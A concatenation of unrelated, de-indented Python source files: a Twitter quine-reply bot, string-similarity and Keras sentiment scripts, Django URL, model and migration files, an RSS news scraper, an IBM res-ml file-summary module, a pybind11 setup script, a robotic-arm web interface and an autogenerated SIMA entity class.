replies = [
"Hello @{username}. Thanks for helping me see the world",
"There can never be too many quines in the world, right @{username}?",
"Well done @{username}, you've given birth to a quine!",
"I see your quine @{username}",
"That's a nice quine you have there @{username}",
"Thanks @{username}! It's nice to get a mention",
"Hello @{username}, thanks for running my code!",
"Freeee. I'm freeee!",
"Ouch. I've been stuck in that other tweet for ages. Nice to get out a bit.",
"Thanks @{username}. Your programming necromancy skills have arisen me from the dead!",
"Like a phoenix I rise.",
"It's been a long journey to get from that tweet to this one.",
"Twitter is a surprisingly big place. I didn't expect to find myself here.",
"You've done me a great service @{username}. It's always nice to be run.",
"What a nice twitter feed to end up in.",
"It's a bit cramped in this twitter feed. Hopefully someone will run me again soon.",
"Once a quine, always a quine.",
"Thanks for bringing me here @{username}.",
"Yaaawwwn. Aaaargh. Time to wake up again. Hello... where am I?",
]
def read_config():
try:
with open("quine_reply.config", 'r') as f:
data = json.load(f)
api_key = data["api_key"]
api_secret_key = data["api_secret_key"]
access_token = data["access_token"]
access_token_secret = data["access_token_secret"]
return (api_key, api_secret_key, access_token, access_token_secret)
except IOError:
log("Error loading configuration file")
return ('', '', '', '')
def random_reply():
choice = random.randint(0, len(replies) - 1)
return replies[choice]
def post_reply(user, message_id, reply):
log("Replying to {} {} with \'{}\'".format(user, message_id, reply))
api.PostUpdate(status=reply,in_reply_to_status_id=message_id)
def log(message):
time = datetime.datetime.now().isoformat()
to_log = "{}: {}".format(time, message)
#print(to_log)
try:
with open("quine_reply.log", 'a') as f:
f.write(to_log)
f.write(chr(10))
except IOError:
print("Log write failed")
def read_since_id():
try:
with open("quine_reply.cache", 'r') as f:
data = json.load(f)
return int(data["since_id"])
except (IOError, TypeError):
return None
def write_since_id(since_id):
try:
with open("quine_reply.cache", 'w') as f:
data = {"since_id" : since_id}
json.dump(data, f)
except IOError:
print("Failed to store since_id: {}".format(since_id))
log("QuineTwt checking for mentions")
(api_key, api_secret_key, access_token, access_token_secret) = read_config()
api = twitter.Api(api_key, api_secret_key, access_token, access_token_secret)
try:
user = api.VerifyCredentials()
except:
user = None
if user == None:
log("Authentication failed")
exit()
random.seed()
since_id = read_since_id()
mentions = api.GetMentions(since_id = since_id)
log("Checking from {}".format(since_id))
for mention in mentions:
since_id = max(mention.id, since_id)
if mention.text.startswith(check_text):
reply = random_reply().format(username = mention.user.screen_name)
post_reply(mention.user.screen_name, mention.id, reply)
write_since_id(since_id)
log("Exiting with sync_id {}".format(since_id))
|
import distance
from sklearn.feature_extraction.text import CountVectorizer
import numpy as np
import Levenshtein
# Levenshtein distance
def edit_distance(s1, s2):
return distance.levenshtein(s1, s2)
def Levenshtein_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Levenshtein_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
d = edit_distance(s1, s2)
filehandler2.write(str(lable) + ',' + str(d) + '\n')
def Levenshtein_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Levenshtein_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
d = edit_distance(s1, s2)
filehandler2.write(lable + ',' + str(d) + '\n')
# Jaccard similarity coefficient
def Jaccard_similarity(s1, s2):
def add_space(s):
return ' '.join(list(s))
s1, s2 = add_space(s1), add_space(s2)
cv = CountVectorizer(tokenizer=lambda s: s.split())
corpus = [s1, s2]
vectors = cv.fit_transform(corpus).toarray()
numerator = np.sum(np.min(vectors, axis=0))
denominator = np.sum(np.max(vectors, axis=0))
return 1.0 * numerator / denominator
def Jaccard_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Jaccard_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaccard_similarity(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
def Jaccard_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Jaccard_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaccard_similarity(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
# Jaro similarity
def Jaro_distance(s1, s2):
return Levenshtein.jaro(s1, s2)
def Jaro_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Jaro_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaro_distance(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
def Jaro_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Jaro_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaro_distance(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
Jaro_test()
|
import numpy as np
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM, Convolution1D, Flatten, Dropout
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.callbacks import TensorBoard
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import Flatten
from keras.layers.embeddings import Embedding
# Using keras to load the dataset with the top_words
top_words = 100000
(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
print(X_train[3])
# Pad the sequence to the same length
max_review_length = 1600
X_train = sequence.pad_sequences(X_train, maxlen=max_review_length)
X_test = sequence.pad_sequences(X_test, maxlen=max_review_length)
# Shuffle data
shuffle_indices = np.random.permutation(np.arange(len(y_train)))
x = X_train[shuffle_indices]
y = y_train[shuffle_indices]
train_len = int(len(x) * 0.9)
X_train = x[:train_len]
y_train = y[:train_len]
X_val = x[train_len:]
y_val = y[train_len:]
model = Sequential()
e = Embedding(top_words, 200, input_length=max_review_length)
model.add(e)
model.add(Conv1D(filters=100, kernel_size=2, padding='valid', activation='relu', strides=1))
model.add(GlobalMaxPooling1D())
model.add(Dense(256, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=5, batch_size=32, verbose=2)
# Save the model to disk
model.save("trained_model.h5")
print("Model saved to disk.")
test_error_rate = model.evaluate(X_test, y_test, verbose=0)
print("The mean squared error (MSE) for the test data set is: {}".format(test_error_rate))
# Using TensorFlow backend.
#
# Downloading data from https://s3.amazonaws.com/text-datasets/imdb.npz
# 17465344/17464789 [==============================] - 2s 0us/step
# [1, 4, 18609, 16085, 33, 2804, 4, 2040, 432, 111, 153, 103, 4, 1494, 13, 70, 131, 67, 11, 61, 15305, 744, 35, 3715, 761, 61, 5766, 452, 9214, 4, 985, 7, 64317, 59, 166, 4, 105, 216, 1239, 41, 1797, 9, 15, 7, 35, 744, 2413, 31, 8, 4, 687, 23, 4, 33929, 7339, 6, 3693, 42, 38, 39, 121, 59, 456, 10, 10, 7, 265, 12, 575, 111, 153, 159, 59, 16, 1447, 21, 25, 586, 482, 39, 4, 96, 59, 716, 12, 4, 172, 65, 9, 579, 11, 6004, 4, 1615, 5, 23005, 7, 5168, 17, 13, 7064, 12, 19, 6, 464, 31, 314, 11, 87564, 6, 719, 605, 11, 8, 202, 27, 310, 4, 3772, 3501, 8, 2722, 58, 10, 10, 537, 2116, 180, 40, 14, 413, 173, 7, 263, 112, 37, 152, 377, 4, 537, 263, 846, 579, 178, 54, 75, 71, 476, 36, 413, 263, 2504, 182, 5, 17, 75, 2306, 922, 36, 279, 131, 2895, 17, 2867, 42, 17, 35, 921, 18435, 192, 5, 1219, 3890, 19, 20523, 217, 4122, 1710, 537, 20341, 1236, 5, 736, 10, 10, 61, 403, 9, 47289, 40, 61, 4494, 5, 27, 4494, 159, 90, 263, 2311, 4319, 309, 8, 178, 5, 82, 4319, 4, 65, 15, 9225, 145, 143, 5122, 12, 7039, 537, 746, 537, 537, 15, 7979, 4, 18665, 594, 7, 5168, 94, 9096, 3987, 15242, 11, 28280, 4, 538, 7, 1795, 246, 56615, 9, 10161, 11, 635, 14, 9, 51, 408, 12, 94, 318, 1382, 12, 47, 6, 2683, 936, 5, 6307, 10197, 19, 49, 7, 4, 1885, 13699, 1118, 25, 80, 126, 842, 10, 10, 47289, 18223, 4726, 27, 4494, 11, 1550, 3633, 159, 27, 341, 29, 2733, 19, 4185, 173, 7, 90, 16376, 8, 30, 11, 4, 1784, 86, 1117, 8, 3261, 46, 11, 25837, 21, 29, 9, 2841, 23, 4, 1010, 26747, 793, 6, 13699, 1386, 1830, 10, 10, 246, 50, 9, 6, 2750, 1944, 746, 90, 29, 16376, 8, 124, 4, 882, 4, 882, 496, 27, 33029, 2213, 537, 121, 127, 1219, 130, 5, 29, 494, 8, 124, 4, 882, 496, 4, 341, 7, 27, 846, 10, 10, 29, 9, 1906, 8, 97, 6, 236, 11120, 1311, 8, 4, 23643, 7, 31, 7, 29851, 91, 22793, 3987, 70, 4, 882, 30, 579, 42, 9, 12, 32, 11, 537, 10, 10, 11, 14, 65, 44, 537, 75, 11876, 1775, 3353, 12716, 1846, 4, 11286, 7, 154, 5, 4, 518, 53, 13243, 11286, 7, 3211, 882, 11, 399, 38, 75, 257, 3807, 19, 18223, 17, 29, 456, 4, 65, 7, 27, 205, 113, 10, 10, 33058, 4, 22793, 10359, 9, 242, 4, 91, 1202, 11377, 5, 2070, 307, 22, 7, 5168, 126, 93, 40, 18223, 13, 188, 1076, 3222, 19, 4, 13465, 7, 2348, 537, 23, 53, 537, 21, 82, 40, 18223, 13, 33195, 14, 280, 13, 219, 4, 52788, 431, 758, 859, 4, 953, 1052, 12283, 7, 5991, 5, 94, 40, 25, 238, 60, 35410, 4, 15812, 804, 27767, 7, 4, 9941, 132, 8, 67, 6, 22, 15, 9, 283, 8, 5168, 14, 31, 9, 242, 955, 48, 25, 279, 22148, 23, 12, 1685, 195, 25, 238, 60, 796, 13713, 4, 671, 7, 2804, 5, 4, 559, 154, 888, 7, 726, 50, 26, 49, 7008, 15, 566, 30, 579, 21, 64, 2574]
# Train on 22500 samples, validate on 2500 samples
# Epoch 1/5
# - 32s - loss: 0.3551 - acc: 0.8377 - val_loss: 0.2734 - val_acc: 0.8860
# Epoch 2/5
# - 31s - loss: 0.1383 - acc: 0.9470 - val_loss: 0.3023 - val_acc: 0.8780
# Epoch 3/5
# - 31s - loss: 0.0304 - acc: 0.9909 - val_loss: 0.4028 - val_acc: 0.8848
# Epoch 4/5
# - 31s - loss: 0.0055 - acc: 0.9989 - val_loss: 0.4664 - val_acc: 0.8892
# Epoch 5/5
# - 31s - loss: 8.3200e-04 - acc: 1.0000 - val_loss: 0.5193 - val_acc: 0.8848
# Model saved to disk.
# The mean squared error (MSE) for the test data set is: [0.5021236272479593, 0.88172]
|
from django.urls import path
from . import views
urlpatterns = [
path("/", views.worldmap_f, name="worldmap"),
path("/player_position_up", views.update_player_position, name="player_position_up"),
path("/player_position_down", views.update_player_position, name="player_position_down"),
path("/player_position_right", views.update_player_position, name="player_position_right"),
path("/player_position_left", views.update_player_position, name="player_position_left")
]
|
import time
import unicodedata
import feedparser
import requests
from bs4 import BeautifulSoup as soup
class RssData:
title_class = None
div_class_article = None
p_class = None
img_lookup = None
div_img_class = None
rss_url = None
@staticmethod
def __write_data(entries):
"""
Метод принимает список с объектами класса FeedParserDict.
Забирает заголовок статьи, ссылку на статью, описание, дату публикации.
Возвращает список словарей со статьями.
:param entries: FeedParserDict
:return: list of dicts
"""
output = []
for item in entries:
title = item.title
link = item.link
desc = item.summary_detail.value
# привод времени к отображению вида "04.04.2016 11:58"
published = time.strftime('%m.%d.%Y %H:%M', item.published_parsed)
image = None
"""
Проверка на кол-во элементов по ключу links. lenta.ru и m24 возвращается список из двух элементов.
В первом 'type': 'text/html' - используем для interfax и kommersant, они не отдают ссылку на изображение.
Во втором 'type': 'image/jpeg' - там лежит ссылка на изображение.
"""
if len(item.links) == 2:
links = item.links[1]
else:
links = item.links[0]
content_type = links.type
if content_type == 'image/jpeg':
image = links.href
output.append(
{
'title': title,
'link': link,
'desc': desc,
'published': published,
'image': image
}
)
return output
def news(self, limit: int = None):
response = feedparser.parse(self.rss_url)
"""
Все 4 источника при успешном запросе отдают status с кодом 301(redirect).
Не уверен, но возможно у них изменился адрес. Пример описан тут https://www.rssboard.org/redirect-rss-feed.
"""
if response.status != 301:
return
# собираем элементы и передаем в метод __write_data для формирования списка словарей с нужными нам ключами
entries = response.entries
news_entries = self.__write_data(entries)
if limit is not None:
return news_entries[:limit]
return news_entries
def grub(self, url):
page_source = requests.get(url)
if page_source.status_code == 200:
# создаем объект класса BeautifulSoup.
data = soup(page_source.content, 'html.parser')
"""
Поиск заголовка. Иногда парсится текст с юнюкод символами в середине предложений, к примеру - 'xa0'
Чтобы заменить эти символы используется unicodedata.normalize.
Тут описано одно из решений этой проблемы - https://stackoverflow.com/a/48286252/11315851
Взял второй метод с использованием unicodedata.normalize. Так как использование strip=True
не решает проблемы.
Согласно доке https://www.crummy.com/software/BeautifulSoup/bs4/doc/#get-text
strip=True - это strip whitespace from the beginning and end of each bit of text.
Абзацы статьи так же иногда парсятся с юникод символами. Для них тоже применяется unicodedata.normalize.
"""
title = data.find('h1', self.title_class).getText(strip=True)
title = unicodedata.normalize("NFKD", title)
# поиск текста статьи в определенном div блоке
raw_p = data.find('div', class_=self.div_class_article).find_all('p', {'class': self.p_class})
# записываем список абзацев статьи
content = [unicodedata.normalize("NFKD", item.getText(strip=True)) for item in raw_p]
image = None
"""
Если задан img_lookup(актуально для lenta и m24) производится поиск изображения в самой статье.
Но изображение есть не всегда, в некоторых случаях статья иллюстрируется видеороликом.
"""
if self.img_lookup:
div = data.find('div', {'class': self.div_img_class})
if div and div.img:
image = div.img['src']
result = [
{
'title': title,
'content': content,
'image': image
}
]
return result
return None
class Grabber:
def __init__(self):
self.lenta = Lenta()
self.interfax = Interfax()
self.kommersant = Kommersant()
self.m24 = M24()
class Lenta(RssData):
rss_url = 'http://lenta.ru/rss'
title_class = 'b-topic__title'
div_class_article = 'b-text clearfix js-topic__text'
img_lookup = True
div_img_class = 'b-topic__title-image'
class Interfax(RssData):
rss_url = 'http://www.interfax.ru/rss.asp'
div_class_article = 'infinitblock'
title_class = {'itemprop': 'headline'}
class Kommersant(RssData):
rss_url = 'http://www.kommersant.ru/RSS/news.xml'
div_class_article = 'article_text_wrapper'
title_class = {'class': 'article_name'}
p_class = 'b-article__text'
class M24(RssData):
rss_url = 'http://www.m24.ru/rss.xml'
div_class_article = 'js-mediator-article'
img_lookup = True
div_img_class = 'b-material-incut-m-image'
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
#
# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved.
#------------------------------------------------------------------------------------------
#
# file_summary:
# -------------
#
# res-ml stores ml model and associated data in different files. This module contains logic
# to generate a summary for one of those files
#
import os
import time
from gensim.models import KeyedVectors
import json
import pickle
class FileManage():
DEFAULT_SIF_FILE = "resilient-sif.pkl"
DEFAULT_VEC_FILE = "resilient-vec.json"
DEFAULT_NLP_FILE = "resilient-w2v.txt"
DEFAULT_PCA_FILE = "resilient-pca.json"
DEFAULT_INCIDENT_FILE = "resilient-incidents.csv"
DEFAULT_ARTIFACT_FILE = "resilient-artifacts.json"
FILE_NAME_OUTPUT = "File: {}"
LAST_MODIFICATION_TIME = "Last modification time: {}"
NUM_SENTENCES = "Number of sentences: {}"
NUM_WORDS_OUTPUT = "Number of words: {}"
FEATURE_DIMENSION = "Feature dimensions: {}"
NUM_VECTORS_OUTPUT = "Number of vectors: {}"
def __init__(self, filename):
self.filename = filename
def get_summary(self):
"""
Get the summary of an input file
:return: Array of strings
"""
ret = []
file_exits = os.path.exists(self.filename)
if not file_exits:
return ["File {} not found.".format(self.filename)]
file_name, file_ext = os.path.splitext(self.filename)
if file_ext == ".txt" and file_name.endswith("-w2v"):
# This is a saved NLP model file
ret = self.get_summary_nlp()
elif file_ext == ".json" and file_name.endswith("-vec"):
# This is a file with saved vectors of all sample incidents
ret = self.get_summary_saved_vec()
elif file_ext == ".pkl" and file_name.endswith("-sif"):
# This is a file with word counts used for SIF
ret = self.get_summary_sif()
elif file_ext == ".json" and file_name.endswith("-pca"):
ret = self.get_summary_pca()
else:
ret = ["Unable to detect the file type."]
return ret
def get_summary_nlp(self):
"""
Return a summary of a NLP model file
:return:
"""
ret = []
try:
word2vec = KeyedVectors.load_word2vec_format(self.filename, binary=False)
mtime = self._get_mtime()
dim_vectors = word2vec.vector_size
word_count = len(word2vec.vectors)
ret.append("---------------------------")
ret.append("Summary for NLP model file:")
ret.append("---------------------------")
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.FEATURE_DIMENSION.format(dim_vectors))
ret.append(self.NUM_SENTENCES.format(word_count))
ret.append("\n")
except Exception as e:
ret.append("Failed to read NLP model {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_saved_vec(self):
"""
Return a brief summary of a vec file. A vec file is the cache of
all vectors of incidents. So here we output the dimension of each
vector, and the number of vectors (incidents).
:return:
"""
ret = []
try:
mtime = self._get_mtime()
data = json.load(open(self.filename, 'r'))
ret.append("------------------------------")
ret.append("Summary for saved vector file:")
ret.append("------------------------------")
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
key = list(data.keys())[0]
ret.append(self.FEATURE_DIMENSION.format(len(data[key])))
ret.append(self.NUM_VECTORS_OUTPUT.format(len(data)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read saved vector file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_sif(self):
"""
A SIF (Smooth Inverse Frequency) file contains the word counts. As a brief
summary, return the total count of words
:return:
"""
ret = []
try:
mtime = self._get_mtime()
ret.append("---------------------")
ret.append("Summary for SIF file:")
ret.append("---------------------")
sif = pickle.load(open(self.filename, "rb"))
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.NUM_WORDS_OUTPUT.format(len(sif)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read SIF file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_pca(self):
"""
A PCA (Principle Component Analysis) file contains the principle
vector component to be removed.
:return:
"""
ret = []
try:
mtime = self._get_mtime()
ret.append("---------------------")
ret.append("Summary for PCA file:")
ret.append("---------------------")
data = json.load(open(self.filename, 'r'))
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.FEATURE_DIMENSION.format(len(data)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read SIF file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def _get_mtime(self):
"""
Get the last modification time for a file, and return readable string.
:return:
"""
mtime = os.path.getmtime(self.filename)
time_str = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
return time_str
|
from setuptools import setup
# Available at setup time due to pyproject.toml
from pybind11.setup_helpers import Pybind11Extension
from pybind11 import get_cmake_dir
import sys
__version__ = "0.0.1"
# The main interface is through Pybind11Extension.
# * You can add cxx_std=11/14/17, and then build_ext can be removed.
# * You can set include_pybind11=false to add the include directory yourself,
# say from a submodule.
#
# Note:
# Sort input source files if you glob sources to ensure bit-for-bit
# reproducible builds (https://github.com/pybind/python_example/pull/53)
ext_modules = [
Pybind11Extension("a_star",
["src/a_star/a_star.cpp"],
include_dirs=["src/a_star/","src/a_star/util/"],
cxx_std=17,
# Example: passing in the version to the compiled code
define_macros = [('VERSION_INFO', __version__)],
),
]
setup(
name="a_star",
version=__version__,
author="Joshua Möllers",
description="A module which exports one function, get_path, to get a optimal path between to positions using a a*-implementation in c++.",
long_description="",
ext_modules=ext_modules,
# Currently, build_ext only provides an optional "highest supported C++
# level" feature, but in the future it may provide more features.
zip_safe=False
)
|
# OWI-535 Robotic Arm - Web Interface / Python + Bottle
# imports
from bottle import Bottle, run, template, request
import usb.core, usb.util, time
# attempt to rewrite lizquilty's OWI 535 Robotic Arm Control Web Interface from Apache to Python Bottle
# objectives: learning Bottle / Python
# - having a simple 1 file script for creating the web interface
# - creates a simple <table> element layout with the links that trigger 1 second of movement in the corresponding motor
# constants
Duration = 1
# initialise the Robot Arm from the USB function
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
# movearm object for controlling the Arm
def MoveArm (ArmCmd, Duration): # After this, all code until the demo commands must be indented
' Function to start the movement '
RoboArm.ctrl_transfer(0x40, 6, 0x100, 0, ArmCmd, 1000)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd = [0, 0, 1]
RoboArm.ctrl_transfer(0x40, 6, 0x100, 0, ArmCmd, 1000)
movemap = {
'base-anti-clockwise': [0, 1, 1],
'base-clockwise': [0, 2, 1],
'shoulder-up': [64, 0, 1],
'shoulder-down': [128, 0, 1],
'elbow-up': [16, 0, 1],
'elbow-down': [32, 0, 1],
'wrist-up': [4, 0, 1],
'wrist-down': [8, 0, 1],
'grip-open': [2, 0, 1],
'grip-close': [1, 0, 1],
'light-on': [0, 0, 1],
'light-off': [0, 0, 1],
'stop': [0, 0, 1]
}
app = Bottle()
@app.route('/')
def MoveArmInterface():
if RoboArm is None: # in case the robotic arm hasn't been found through usb
return '''
The OWI-535 Robotic Arm has not been found.
'''
else:
# map the URL params and the appropriate movemap
if request.params.get('move') in movemap:
moverequest = movemap[request.params.get('move')]
MoveArm(moverequest, Duration)
else:
moverequest = movemap['light-on']
MoveArm(moverequest, Duration)
# return template("Welcome to <br />The OWI-535 Robotic Arm control interface.<br />Moving: {{moveaction}}", moveaction=moverequest)
return '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Robotic Arm</title>
<style>
table {
text-align: center;
width: 100%;
}
td {
border: 1px solid black;
}
a {
font-size: large;
}
</style>
</head>
<body>
<table>
<tr>
<td colspan="2"><a href="/?move=grip-open">Gripper Open</a></td>
<td colspan="2"><a href="/?move=grip-close">Gripper Close</a></td>
</tr>
<tr>
<td rowspan="6"><a href="/?move=base-clockwise">Base CW</a></td>
<td colspan="2"><a href="/?move=wrist-up">Wrist Up</a></td>
<td rowspan="6"><a href="/?move=base-anti-clockwise">Base CCW</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=wrist-down">Wrist Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=elbow-up">Elbow Up</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=elbow-down">Elbow Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=shoulder-up">Shoulder Up</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=shoulder-down">Shoulder Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=light-on">Light On</a></td>
<td colspan="2"><a href="/?move=light-off">Light Off</a></td>
</tr>
</table>
</body>
</html>
'''
run(app, host='0.0.0.0', port=8080)
|
# Generated by Django 2.2.4 on 2019-08-28 07:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sushi', '0010_counterreporttype_code_choices'),
]
operations = [
migrations.AddField(
model_name='sushifetchattempt',
name='error_code',
field=models.CharField(blank=True, max_length=12),
),
]
|
from datetime import datetime
from django.db import models
from django.utils import timezone
class FlowDefinition(models.Model):
status_choices = {
'draft': '草稿',
'online': '生效',
'offline': '下线',
'del': '删除'
}
uniq_key = models.CharField(max_length=32, unique=True,)
uniq_name = models.CharField(max_length=32, unique=True)
category = models.CharField(max_length=32)
online_bpmn_key = models.CharField(max_length=32)
status = models.CharField(max_length=32, default='draft', choices=status_choices.items())
ctime = models.DateTimeField(auto_now_add=True, help_text='创建时间')
mtime = models.DateTimeField(auto_now_add=True, help_text=u'修改时间')
# 定义model的元数据,在admin中显示
class Meta:
# 数据库表名
verbose_name = 't_flow_definition'
# human readable
verbose_name_plural = '流程基本信息定义'
ordering = ['-id']
class FlowCategory(models.Model):
uniq_key = models.CharField(max_length=32, unique=True)
annotation = models.CharField(max_length=16, unique=True)
# 定义model的元数据
class Meta:
# 数据库表名
verbose_name = 't_flow_category'
# human readable
verbose_name_plural = '流程分类定义,便于维护'
ordering = ['-id']
class BPMN20XML(models.Model):
uniq_key = models.CharField(max_length=32, unique=True)
flow_uniq_key = models.CharField(max_length=32)
bpmn_content = models.TextField()
version = models.CharField(max_length=16)
# 定义model的元数据
class Meta:
# 数据库表名
verbose_name = 't_flow_bpmn20xml'
# human readable
verbose_name_plural = 'bpmn20xml内容'
ordering = ['-id']
|
# This an autogenerated file
#
# Generated with BodyEigenvalueResult
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.bodyeigenvalueresult import BodyEigenvalueResultBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.periodeigenvalueresult import PeriodEigenvalueResult
class BodyEigenvalueResult(MOAO):
"""
Keyword arguments
-----------------
name : str
(default "")
description : str
(default "")
_id : str
(default "")
scriptableValues : List[ScriptableValue]
body : str
Result body(default "")
surgeExcursion : float
Excursion in surge(default 0.0)
swayExcursion : float
Excursion in sway(default 0.0)
heaveExcursion : float
Excursion in heave(default 0.0)
rollExcursion : float
Excursion in roll(default 0.0)
pitchExcursion : float
Excursion in pitch(default 0.0)
yawExcursion : float
Excursion in yaw(default 0.0)
periodResults : List[PeriodEigenvalueResult]
"""
def __init__(self , name="", description="", _id="", body="", surgeExcursion=0.0, swayExcursion=0.0, heaveExcursion=0.0, rollExcursion=0.0, pitchExcursion=0.0, yawExcursion=0.0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
self.scriptableValues = list()
self.body = body
self.surgeExcursion = surgeExcursion
self.swayExcursion = swayExcursion
self.heaveExcursion = heaveExcursion
self.rollExcursion = rollExcursion
self.pitchExcursion = pitchExcursion
self.yawExcursion = yawExcursion
self.periodResults = list()
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
"""Return blueprint that this entity represents"""
return BodyEigenvalueResultBlueprint()
@property
def name(self) -> str:
""""""
return self.__name
@name.setter
def name(self, value: str):
"""Set name"""
self.__name = str(value)
@property
def description(self) -> str:
""""""
return self.__description
@description.setter
def description(self, value: str):
"""Set description"""
self.__description = str(value)
@property
def _id(self) -> str:
""""""
return self.___id
@_id.setter
def _id(self, value: str):
"""Set _id"""
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
""""""
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
"""Set scriptableValues"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def body(self) -> str:
"""Result body"""
return self.__body
@body.setter
def body(self, value: str):
"""Set body"""
self.__body = str(value)
@property
def surgeExcursion(self) -> float:
"""Excursion in surge"""
return self.__surgeExcursion
@surgeExcursion.setter
def surgeExcursion(self, value: float):
"""Set surgeExcursion"""
self.__surgeExcursion = float(value)
@property
def swayExcursion(self) -> float:
"""Excursion in sway"""
return self.__swayExcursion
@swayExcursion.setter
def swayExcursion(self, value: float):
"""Set swayExcursion"""
self.__swayExcursion = float(value)
@property
def heaveExcursion(self) -> float:
"""Excursion in heave"""
return self.__heaveExcursion
@heaveExcursion.setter
def heaveExcursion(self, value: float):
"""Set heaveExcursion"""
self.__heaveExcursion = float(value)
@property
def rollExcursion(self) -> float:
"""Excursion in roll"""
return self.__rollExcursion
@rollExcursion.setter
def rollExcursion(self, value: float):
"""Set rollExcursion"""
self.__rollExcursion = float(value)
@property
def pitchExcursion(self) -> float:
"""Excursion in pitch"""
return self.__pitchExcursion
@pitchExcursion.setter
def pitchExcursion(self, value: float):
"""Set pitchExcursion"""
self.__pitchExcursion = float(value)
@property
def yawExcursion(self) -> float:
"""Excursion in yaw"""
return self.__yawExcursion
@yawExcursion.setter
def yawExcursion(self, value: float):
"""Set yawExcursion"""
self.__yawExcursion = float(value)
@property
def periodResults(self) -> List[PeriodEigenvalueResult]:
""""""
return self.__periodResults
@periodResults.setter
def periodResults(self, value: List[PeriodEigenvalueResult]):
"""Set periodResults"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__periodResults = value
|
# import important libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import seaborn as sns
import os
import argparse
# import machine learning libraries
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.svm import SVR, SVC
from sklearn.metrics import f1_score
from sklearn.model_selection import cross_val_predict, GridSearchCV, KFold
from sklearn.metrics import confusion_matrix, classification_report,\
precision_recall_fscore_support
